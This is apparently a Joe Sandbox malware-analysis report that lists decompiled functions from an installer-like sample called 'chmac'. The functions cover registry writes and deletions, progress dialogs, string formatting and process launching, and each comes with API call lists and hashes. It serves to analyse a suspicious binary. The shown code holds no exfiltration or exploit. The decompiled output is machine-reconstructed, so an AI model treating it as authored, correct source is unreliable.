Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99

Uniqueness

Uniqueness Score: -1.00%

Function 004022F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t31 =  *0x423f50 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a368) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a368 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402333
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq5FC4.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402353
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsq5FC4.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238C
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsq5FC4.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246F

Strings

C:\Users\user\AppData\Local\Temp\nsq5FC4.tmp, xrefs: 00402344, 00402366, 00402376, 00402381

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsq5FC4.tmp
API String ID: 1356686001-334961708
Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69

Uniqueness

Uniqueness Score: -1.00%

Function 00402BC5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BC5(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t14;

				if(_a4 != 0) {
					_t14 =  *0x417044; // 0x0
					if(_t14 != 0) {
						_t14 = DestroyWindow(_t14);
					}
					 *0x417044 = 0;
					return _t14;
				}
				__eflags =  *0x417044; // 0x0
				if(__eflags != 0) {
					return E00405DDC(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8;
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
						 *0x417044 = _t7;
						return _t7;
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BA9());
						return E00404E23(0,  &_v68);
					}
				}
				return _t6;
			}

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
GetTickCount.KERNEL32 ref: 00402BFB
CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D

Part of subcall function 00402BA9: MulDiv.KERNEL32(0003E9C5,00000064,00041253), ref: 00402BBE

wsprintfA.USER32 ref: 00402C29

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Strings

... %d%%, xrefs: 00402C23

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 632923820-2449383134
Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE

Uniqueness

Uniqueness Score: -1.00%

Function 00402A28, Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402A28(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A28(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DA3(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A49
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
RegCloseKey.ADVAPI32(?), ref: 00402A8E
RegCloseKey.ADVAPI32(?), ref: 00402AB3
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ccb
0x00401cd2
0x00401d01
0x00401d09
0x00401d10
0x00401d10
0x00402880
0x0040288c

APIs

GetDlgItem.USER32 ref: 00401CC5
GetClientRect.USER32 ref: 00401CD2
LoadImageA.USER32 ref: 00401CF3
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29

Uniqueness

Uniqueness Score: -1.00%

Function 00404610, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
			}

APIs

lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
wsprintfA.USER32 ref: 004046A6
SetDlgItemTextA.USER32 ref: 004046B9

Strings

%u.%u%s%s, xrefs: 00404688

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E004059E3();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728

Uniqueness

Uniqueness Score: -1.00%

Function 004052E5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004052E5(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004052ee
0x0040530a
0x00405312
0x00405317
0x00000000
0x0040531d
0x00405321

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
CloseHandle.KERNEL32(?), ref: 00405317

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
Error launching installer, xrefs: 004052F8

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
API String ID: 3712363035-2984075973
Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69

Uniqueness

Uniqueness Score: -1.00%

Function 00405578, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405578(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}

0x00405579
0x00405590
0x00405598
0x00405598
0x004055a0

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
lstrcatA.KERNEL32(?,0040900C), ref: 00405598

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405578

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3916508600
Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24

Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af7c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af83 = 1;
				 *0x40af80 = _t11 & 0x00000001;
				 *0x40af81 = _t11 & 0x00000002;
				 *0x40af82 = _t11 & 0x00000004;
				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af6c);
				_push(_t14);
				_push(_t26);
				E004059E3();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d29
0x00401d42
0x00401d4c
0x00401d51
0x00401d5c
0x00401d63
0x00401d75
0x00401d7b
0x00401d80
0x00401d8a
0x004024aa
0x00401561
0x00402825
0x00402880
0x0040288c

APIs

GetDC.USER32(?), ref: 00401D22
